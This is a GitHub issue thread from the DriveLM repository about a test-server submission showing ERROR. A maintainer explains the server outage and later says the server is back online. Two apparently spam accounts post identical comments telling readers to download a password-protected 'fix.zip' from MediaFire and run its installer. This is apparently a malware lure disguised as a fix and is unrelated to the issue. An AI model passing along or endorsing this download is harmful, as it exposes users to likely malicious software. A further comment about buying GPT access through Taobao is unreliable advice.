### ISSUE TITLE
提交结果显示错误

### ISSUE THREAD

**Issue by scl-01** [OpenDriveLab/DriveLM#112]
![image](https://github.com/user-attachments/assets/175db829-6823-4db3-8359-28f778bce061)
如图，之前提交过的一个任务，上周查看结果正常，但是现在查看显示ERROR，分数还存在，是有什么bug吗？

**Comment by ChonghaoSima** [comment]
It might be the case that we restarted the test server and your submission accidentally restarted as well.

Best
Chonghao Sima
________________________________
From: scl-01 ***@***.***>
Sent: Monday, August 26, 2024 11:43:48 AM
To: OpenDriveLab/DriveLM ***@***.***>
Cc: Subscribed ***@***.***>
Subject: [OpenDriveLab/DriveLM] 提交结果显示错误 (Issue #112)

---- External Email: Use caution with attachments, links, or sharing data ----


image.png (view on web)<https://github.com/user-attachments/assets/175db829-6823-4db3-8359-28f778bce061>
如图，之前提交过的一个任务，上周查看结果正常，但是现在查看显示ERROR，分数还存在，是有什么bug吗？

―

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ChonghaoSima** [comment]
Seems like test server is down. We are actively reaching out hf team for support and the estimated time of fix may vary.

**Comment by 24werewolf** [comment]
> Seems like test server is down. We are actively reaching out hf team for support and the estimated time of fix may vary.

有预计什么时候解决吗？或者解决了通知一下？我们提交好几好多次，都无法进行评测。

**Comment by ChonghaoSima** [comment]
> > Seems like test server is down. We are actively reaching out hf team for support and the estimated time of fix may vary.
> 
> 有预计什么时候解决吗？或者解决了通知一下？我们提交好几好多次，都无法进行评测。

It depends on the openai key supplier and the huggingface test team.

**Comment by 24werewolf** [comment]
> > > Seems like test server is down. We are actively reaching out hf team for support and the estimated time of fix may vary.
> > 
> > 
> > 有预计什么时候解决吗？或者解决了通知一下？我们提交好几好多次，都无法进行评测。
> 
> It depends on the openai key supplier and the huggingface test team.
"Hi. I encountered the same issue when setting up a local evaluation for GPT. In the end, I resolved it by renewing my GPT account on Taobao, and I hope this solution can be helpful to you too!"

**Comment by ChonghaoSima** [comment]
Test server back online.
